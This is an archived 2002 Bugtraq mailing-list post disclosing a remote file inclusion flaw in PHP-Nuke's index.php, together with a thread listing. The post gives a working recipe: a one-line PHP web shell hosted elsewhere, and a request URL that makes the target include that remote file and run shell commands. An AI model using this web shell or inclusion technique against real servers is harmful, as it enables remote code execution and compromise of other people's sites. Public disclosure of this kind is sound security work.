Bugtraq mailing list archives
PHP-Nuke allows Command Execution & Much more
From: "Handle Nopman" <nopman () hackermail com>
Date: Thu, 17 Jan 2002 02:30:53 +0800
Hi All! I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code. The flaw is in the index.php's include file feature. It allows including files like index.php?file=file It prevents users including ..'s in URL's, but it didn't prevent users from entering http://-urls Remember the PHP's remote get feature... How to exploit: Upload this file to some free web space provider or setup your own server: <?php system($cmd); ?> Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al will execute ls -al command. I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies) Vendor status: I contacted the author on 28.12.2001 and he hasn't replied. Sincrely "Nopman" -- Powered by Outblaze
Current thread:
- PHP-Nuke allows Command Execution & Much more Handle Nopman (Jan 16)
- <Possible follow-ups>
- Re: PHP-Nuke allows Command Execution & Much more truff (Jan 21)
- Re: PHP-Nuke allows Command Execution & Much more RoMaNSoFt (Jan 24)